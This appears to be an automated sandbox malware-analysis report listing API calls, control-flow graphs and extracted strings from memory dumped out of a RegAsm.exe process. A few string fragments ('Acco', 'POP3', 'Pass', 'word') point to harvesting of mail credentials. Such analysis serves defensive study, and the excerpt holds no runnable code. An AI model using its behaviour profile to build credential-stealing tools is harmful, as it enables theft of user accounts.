                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3519776433-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1807457897-3916222277

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String
                                                                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                                                                      • API String ID: 2568140703-3893581201

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Alloc
                                                                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                                                                      • API String ID: 2773662609-671089009

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                                                                      • String ID: FlsAlloc
                                                                                                                                                                                                                      • API String ID: 2742660187-671089009

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 546120528-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 336 10006c5f-10006c89 call 10005af6 call 10006d7e call 100069f3 343 10006c8b-10006c8d 336->343 344 10006c8f-10006ca4 call 100056d0 336->344 345 10006ce2-10006ce5 343->345 348 10006cd4 344->348 349 10006ca6-10006cbc call 10006e20 344->349 351 10006cd6-10006ce1 call 1000571e 348->351 352 10006cc1-10006cc7 349->352 351->345 354 10006ce6-10006cea 352->354 355 10006cc9-10006cce call 10006368 352->355 357 10006cf1-10006cfc 354->357 358 10006cec call 10007bbc 354->358 355->348 361 10006d13-10006d2d 357->361 362 10006cfe-10006d08 357->362 358->357 361->351 365 10006d2f-10006d36 361->365 362->361 364 10006d0a-10006d12 call 1000571e 362->364 364->361 365->351 367 10006d38-10006d4f call 100068c9 365->367 367->351 371 10006d51-10006d5b 367->371 371->351
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                        • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                        • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                                                                        • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                                                                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2991157371-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 372 10001eec-10001ef5 373 10001ef7-10001efa 372->373 374 10001f2a-10001f35 dllmain_crt_process_detach 372->374 376 10001f1c-10001f28 dllmain_crt_process_attach 373->376 377 10001efc-10001eff 373->377 375 10001f3a 374->375 378 10001f3b-10001f3c 375->378 376->375 379 10001f01-10001f04 377->379 380 10001f12 call 100023ec 377->380 381 10001f06-10001f09 379->381 382 10001f0b-10001f10 call 1000240b 379->382 385 10001f17-10001f1a 380->385 381->378 382->385 385->378
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                                                      • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3750050125-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 387 100038e8-100038ed call 10003af1 389 100038f2-100038fb 387->389 390 10003900-1000390f call 10003ba2 389->390 391 100038fd-100038ff 389->391 394 10003911-10003916 call 1000391b 390->394 395 10003918-1000391a 390->395 394->391
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 806969131-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __crt_fast_encode_pointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3768137683-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                      • API String ID: 4218353326-3023110444
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                      • API String ID: 4218353326-230879103
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                                      • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                                      • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1922816806-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                      • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
